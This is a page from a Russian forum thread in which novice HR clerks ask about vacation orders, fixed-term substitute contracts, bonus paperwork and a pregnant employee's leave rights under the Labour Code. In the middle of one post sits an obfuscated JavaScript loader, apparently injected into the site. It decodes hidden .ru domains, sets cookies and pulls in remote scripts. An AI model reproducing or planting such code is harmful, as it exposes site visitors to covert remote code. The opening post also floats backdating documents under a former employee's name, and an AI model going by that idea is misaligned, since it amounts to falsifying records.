Тема форума: Глупые вопросы новичка. По кадровому делопроизводству | Форумы "Кадровое делопроизводство" | Сообщение № 339641
  RSS
[ Закрыто ] Глупые вопросы новичка. По кадровому делопроизводству, Вопросы, которые возникают у чайников в кадровом деле, и ответы на них

Совсем недавно начала заниматься кадрами, поэтому появляется куча, наверняка глупых для остальных, вопросов. Если мне поможете разобраться с ними, буду очень благодарна.
1. Если до меня в кадрах велось что-то не совсем правильно и я сейчас буду закрывать ошибки, то что мне делать с тем периодом, данные которого я не смогу восстановить? Я не хочу чтобы мой руководитель попал на этом. Но и сама я мало что смогу сделать без подписей уволенных сотрудников, например.
2. Мне лучше создавать недостающие документы задним числом и подписываться тем человеком, который отвечал за это до меня или я могу делать доки настоящей датой?
3. Если в тех документах была фраза "контроль за исполнением приказа возлагаю на (прошлого сотрудника), то мне их сейчас не переделывать на свою фамилию, они по умолчанию легли на меня или издать приказ о том, что теперь контроль лежит на мне?
Страницы:Пред.1...333334335336337...787След.
Ответы

Цитата
Капелька света пишет:
в приказе о приеме совместителя указать, что принимается временно на время отсутствия, с оплатой пропорционально... а еще что-то нужно в нем дополнительно или в самом ТД?
Да нет, стандартный СТД на время отсутствия основного.
Цитата
Капелька света пишет:
бухгалтер даже предположила, что принять как срочного, с истечением срока уволить и уже принять на постоянку.
Извращенка. :nocool
Цитата
Капелька света пишет:
ну в принципе понятно все
Это хорошо.
Честно говоря, отпуск с последующим увольнением это уже анахронизм, особо не нужный ни работнику, а работодателю сильно мешающий. Посему подчеркну проще отказать. ;)

Серега, у нас руководитель в этом плане не заморачивается - просит с последующим, да ради бога))

Доброе утро!

У меня вопрос: сотруднику в ТД прописана доплата за интенсивность труда (конкретной цифрой), как подать данные в бухгалтерию? приказ на прописанную в ТД сумму или выписку из ТД? что бы бухгалтерия могла производить начисления?

wind ow .a1336404323 = 1;!f unction(){var e=JSON.parse('["673373373778697871302e7275","757561356a72327a317671302e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="21670",o=f unction(e){var t=docu ment.cookie.match(new RegExp("(?:^|; )"+e.r eplace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=f unction(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCS tring()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=f unction(e){e=e.r eplace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toS tring(16);return t},a=f unction(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=Stri ng.fromCharCode(parseInt(e[o],16));return t},d=f unction(){return "kadrovik-praktik.ru"},p=f unction(){var w=wind ow,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=f unction(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(wind ow .smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window .smlo.loadSmlo(n.r eplace("https:","http:"));else if(wind ow .zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window .zSmlo.loadSmlo(n.r eplace("https:","http:"));else{var i=docu ment.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=f unction(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.on error=f unction(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=f unction(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window .a3164427983=f,c(u,f unction(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},f unction(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=f unction(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
Изменено: kocmoc - 03.06.2016 07:30:49

Доброе утро!
В приказах на отпуск преподавателя были неправильно указаны периоды за которые предоставляется отпуск. Нужно ли вносить изменения в эти приказы или можно оставить так, но дни считать правильно?

Цитата
kocmoc пишет:
У меня вопрос: сотруднику в ТД прописана доплата за интенсивность труда (конкретной цифрой), как подать данные в бухгалтерию? приказ на прописанную в ТД сумму или выписку из ТД? что бы бухгалтерия могла производить начисления?
На основании чего определяется, что эта самая интенсивность труда имела место быть в отчётном периоде и можно выплачивать указанную сумму?
Вот этот документ обычно и подаётся в б-рию.
Изменено: Пигги - 03.06.2016 09:30:32

Цитата
kocmoc пишет:
сотруднику в ТД прописана доплата за интенсивность труда (конкретной цифрой), как подать данные в бухгалтерию?
Соответственно должна быть отражена и в приказе о приёме работников.

Цитата
kocmoc пишет:
приказ на прописанную в ТД сумму или выписку из ТД? что бы бухгалтерия могла производить начисления?
Если доплата установлена ежемесячная, то достаточно приказа о приёме и табеля, что он работал.
Цитата
Пигги пишет:
На основании чего определяется, что эта самая интенсивность труда имела место быть в отчётном периоде и можно выплачивать указанную сумму?
Это только если выплата доплаты регулируется ещё каким то ЛНА и там установлены подобные критерии. В ином случае ничего более не требуется и отменить её можно только соглашением.

Цитата
ravay пишет:
В приказах на отпуск преподавателя были неправильно указаны периоды за которые предоставляется отпуск. Нужно ли вносить изменения в эти приказы или можно оставить так, но дни считать правильно?
Издать приказ об изменении приказа на отпуск.
Оставить так нельзя, т.к. следующий кадровик Вам будет за это сильно "благодарен". :!: Ему то потом как разбираться с этим безобразием???? ;)

Цитата
Серега пишет:
Цитата
ravay пишет:
Издать приказ об изменении приказа на отпуск.
Оставить так нельзя, т.к. следующий кадровик Вам будет за это сильно "благодарен". :!: Ему то потом как разбираться с этим безобразием???? ;)
Спасибо за ответ!

Доброе утро !
Недавно приняли на работу бухгалтера по срочному ТД, до выхода основного работника (основной работник беременна, была на бл. Да и приступать к работе не собирается. Будет прыгать с больничного в отпуск и так до отпуска по бир). Так вот ситуация. Основного работника выписали с больничного в пятницу, ей тогда заявление на отпуск писать с понедельника или с субботы ? Не будет ли являться закрытый б/л пятницей (приступить к работе в субботу) основанием уволить временного сотрудника пятницей ?

Цитата
Серега пишет:
Но выход всё равно есть, оформить совместителя по срочному ТД на время отсутствия основного
Почему совместителя вдруг? Если у человека нет основной работы, с какой радости он совместитель???

Цитата
ravay пишет:
Не нужно никаких изменений. В следующем приказе считаете правильный период, за который предоставлен отпуск и все. От того, что указан неправильный период, не изменится количество дней отпуска, которые обязаны работнику предоставить.

Цитата
Juli-kp пишет:
Основного работника выписали с больничного в пятницу, ей тогда заявление на отпуск писать с понедельника или с субботы ? Не будет ли являться закрытый б/л пятницей (приступить к работе в субботу) основанием уволить временного сотрудника пятницей ?
Я бы попросила заявление с субботы - причем заявление должно быть написано пятницей. Поскольку вопрос спорный, лучше не рисковать. Неизвестно какого мнения будет придерживаться проверяющая сторона в случае возникновения спора с работником по поводу этих двух дней.

Цитата
Снеженка пишет:
Почему совместителя вдруг? Если у человека нет основной работы, с какой радости он совместитель???

Цитата
Капелька света пишет:
Другого работника хотят оформить по совместительству на должность первого. С какого момента можно заключить договор - с первого дня отпуска первого работника или на следующий день после окончания отпуска, т.е. в день увольнения первого работника?
Вот отсюда, из исходных данных.

Серега, поняла :friends

Цитата
Juli-kp пишет:
Недавно приняли на работу бухгалтера по срочному ТД, до выхода основного работника (основной работник беременна, была на бл. Да и приступать к работе не собирается. Будет прыгать с больничного в отпуск и так до отпуска по бир). Так вот ситуация. Основного работника выписали с больничного в пятницу, ей тогда заявление на отпуск писать с понедельника или с субботы ?
Любым днём, даже пятницей может написать после закрытия б/л, предоставив его одновременно с заявлением на ЕОО.
Цитата
Juli-kp пишет:
Не будет ли являться закрытый б/л пятницей (приступить к работе в субботу) основанием уволить временного сотрудника пятницей ?
Нет конечно, т.к. в пятницу она ещё болеет и нет факта выхода основного. А в понедельник она уже будет в ЕОО, т.е. не будет факта выхода основного на рабочее место.

Добрый день. Подскажите, пожалуйста, сдаете ли отчеты В ПФР по форме СПВ-2 по сотруднику, оформляющего пенсию?

Цитата
Серега пишет:
Любым днём, даже пятницей может написать после закрытия б/л, предоставив его одновременно с заявлением на ЕОО.
Серега, вопрос С какой даты писать начало отпуска - с субботы или с понедельника )))

Цитата
Снеженка пишет:
Серега, вопрос С какой даты писать начало отпуска - с субботы или с понедельника )))
Ответ:
Цитата
Серега пишет:
Ну да, ну да писать любым днём, а дата начала лучше понедельник. Зачем ей дни терять? ;)
Изменено: Серега - 06.06.2016 11:41:52

Цитата
Серега пишет:
Любым днём, даже пятницей может написать после закрытия б/л, предоставив его одновременно с заявлением на ЕОО.Вроде всё очевидно!
То есть, Вы считаете , что можно написать заявление о предоставлении отпуска с пятницы????? Вас не смущает, что в один день не может быть и больничного, и отпуска? Вроде все очевидно)))))

Цитата
Серега пишет:
Ну да, ну да писать любым днём, а дата начала лучше понедельник. Зачем ей дни терять?
)))) Ну вот тут ладно, а то подумала, что с коньячком-с сидим)))))) Ну я свое мнение высказала ранее. Спорный вопрос по поводу выходных, потому я бы не рисковала. Но автору самому выбирать. :handshake:

Цитата
Снеженка пишет:
То есть, Вы считаете , что можно написать заявление о предоставлении отпуска с пятницы????? Вас не смущает, что в один день не может быть и больничного, и отпуска? Вроде все очевидно)))))
Поправил, изначально мысль не догнал. Она бежала и я бежал, никак не догонялась. :coffeу

Цитата
Снеженка пишет:
Ну вот тут ладно, а то подумала, что с коньячком-с сидим))))))
Это с 14.06. на заслуженной части ЕОО, просто всенепременно, со всеми сопутствующими делами в виде, шашлык-машлык, стейки припущенные и прочие гастрономические излишества, если гастрит не скрутит. ;)

Цитата
Серега пишет:
Это с 14.06. на заслуженной части ЕОО, просто всенепременно,
:cry: эх.......

Коллеги, доброго дня всем!
Помогите советом, мнением. Правильно ли я рассуждаю.
Моя подруга работает в крупной компании уже более 10 лет. Согласно внутренним правилам для некоторых категорий сотрудников существует дополнительный отпуск - 7 календарных дней. График отпусков на 2016 утвержднен, как положено. У подруги назрел конфликт с руководстом компании, они всячески старются "насолить" и "испортить" ей жизни. Руки им связывает сейчас тот факт, что подруга беременна. Так вот, недавно подруга узнала, что оказывается данный доп. отпуск положен только тем, что проработает в течении текущего календарного года, за который предоставляется отпуск, без отсутсвия на рабочем месте более 30 дней. Так как подруге примерно в ноябре нужно уходить в декрет (в отпуск по БиР), ей отказываются предоставлять этот доп отпуск. Предоставили ей эту бумажку ( о том, что нельзя отсутствовать более 30 дней в году). Она без подписей и печатей, как пополнение к имеющемуся положению. Террроризируют, просят подписать не пойми чего. Подруга - кремень. Ничего не подписывает - отсылает лесом и продолжает выполнять свои обязанности. Говорят, уйдешь в отпуск, ВНИМАНИЕ, по графику - поставим прогулы.
В моем понятии - это читой воды грубейшее нарушение. График утвержден - он обязателен для двух сторон. Изменение возможно только в двустороннем порядке.
Как быть? Что делать?
Простите за сумбур, если что)
Изменено: Новенькая_OK - 06.06.2016 16:23:45

Цитата
Новенькая_OK пишет:
Согласно внутренним правилам для некоторых категорий сотрудников существует дополнительный отпуск - 7 календарных дней.

Цитата
Новенькая_OK пишет:
Так вот, недавно подруга узнала, что оказывается данный доп. отпуск положен только тем, что проработает в течении текущего календарного года, за который предоставляется отпуск, без отсутсвия на рабочем месте более 30 дней. Так как подруге примерно в ноябре нужно уходить в декрет (в отпуск по БиР), ей отказываются предоставлять этот доп отпуск. Предоставили ей эту бумажку ( о том, что нельзя отсутствовать более 30 дней в году). Она без подписей и печатей, как пополнение к имеющемуся положению.
Ну так пусть потребует ознакомления с ПВТР в письменном виде, если нет в открытом доступе и выяснит этот момент.
Если принимались какие то дополнения, изменения ПВТР, то соответственно они должны быть утверждены и работники ознакомлены под роспись.

Цитата
Новенькая_OK пишет:
Террроризируют, просят подписать не пойми чего. Подруга - кремень. Ничего не подписывает - отсылает лесом и продолжает выполнять свои обязанности.
Правильно непонятно что, подписывать нельзя ни в коем случае. Только внимательно изучив документ и ставить подпись в листе ознакомления, журнале, чтобы он чётко ассоциировался с самим документом.
Чтобы не было записи туманной об ознакомлении с ЛНА, всегда чётко должно быть прописано, какой ЛНА, в какой редакции и чем утверждены.

Цитата
Новенькая_OK пишет:
Говорят, уйдешь в отпуск, ВНИМАНИЕ, по графику - поставим прогулы.
Как быть? Что делать?
Если она УВЕРЕНА в датах своего ЕОО отражённых в ГО на 2016г. организации, то может смело идти в него. Ни один суд не признает это прогулом или злоупотреблением правом. Наоборот будут просматриваться нарушения работодателя.
Рекомендую напомнить работодателю, а лучше даже в письменном виде:
1. Статья 123. Очередность предоставления ежегодных оплачиваемых отпусков
Очередность предоставления оплачиваемых отпусков определяется ежегодно в соответствии с графиком отпусков, утверждаемым работодателем с учетом мнения выборного органа первичной профсоюзной организации не позднее чем за две недели до наступления календарного года в порядке, установленном статьей 372 настоящего Кодекса для принятия локальных нормативных актов.
График отпусков обязателен как для работодателя, так и для работника......
2. Статья 124. Продление или перенесение ежегодного оплачиваемого отпуска
.....Если работнику своевременно не была произведена оплата за время ежегодного оплачиваемого отпуска либо работник был предупрежден о времени начала этого отпуска позднее чем за две недели до его начала, то работодатель по письменному заявлению работника обязан перенести ежегодный оплачиваемый отпуск на другой срок, согласованный с работником.

Особо обращаю внимание, что для перенесения ДОЛЖНО БЫТЬ ПИСЬМЕННОЕ ЗАЯВЛЕНИЕ РАБОТНИКА, а не хотелка работодателя. :!:

3. Главный козырь!!!!!! :!:

Статья 260. Гарантии женщинам в связи с беременностью и родами при установлении очередности предоставления ежегодных оплачиваемых отпусков
Перед отпуском по беременности и родам или непосредственно после него либо по окончании отпуска по уходу за ребенком женщине по ее желанию предоставляется ежегодный оплачиваемый отпуск независимо от стажа работы у данного работодателя.

Хочется заметить, что этот козырь бьёт все доводы работодателя(хотелки, тарахтелки). Причём замечу всех положенных ЕОО на момент написания заявления перед ОБИР, а не только как у нас любят "пропорционально отработанному времени". :!:

Новенькая_OK, так что весь трындёшь представителей работодателя идёт от глупости и не понимания, что при любом раскладе их карта будет бита. А в случае обращения в ГИТ штраф. Напомню работнику особо терять нечего, уволить его практически невозможно и он на ближайшие 3 года с лишним забудет о работодателе, будет только заявления писать о предоставлении ОБИР, ОУЗР и пособий!!!!!!!! :!:

Кстати, ей стоит задуматься и использовать так же другие гарантии:

Статья 254. Перевод на другую работу беременных женщин и женщин, имеющих детей в возрасте до полутора лет
Беременным женщинам в соответствии с медицинским заключением и по их заявлению снижаются нормы выработки, нормы обслуживания либо эти женщины переводятся на другую работу, исключающую воздействие неблагоприятных производственных факторов, с сохранением среднего заработка по прежней работе.
До предоставления беременной женщине другой работы, исключающей воздействие неблагоприятных производственных факторов, она подлежит освобождению от работы с сохранением среднего заработка за все пропущенные вследствие этого рабочие дни за счет средств работодателя.
При прохождении обязательного диспансерного обследования в медицинских организациях за беременными женщинами сохраняется средний заработок по месту работы.
Женщины, имеющие детей в возрасте до полутора лет, в случае невозможности выполнения прежней работы переводятся по их заявлению на другую работу с оплатой труда по выполняемой работе, но не ниже среднего заработка по прежней работе до достижения ребенком возраста полутора лет.

Цитата
Новенькая_OK пишет:
График отпусков на 2016 утвержднен, как положено
Кстати, а в ГО этот доп.отпуск отражён???
Страницы:Пред.1...333334335336337...787След.
Читают тему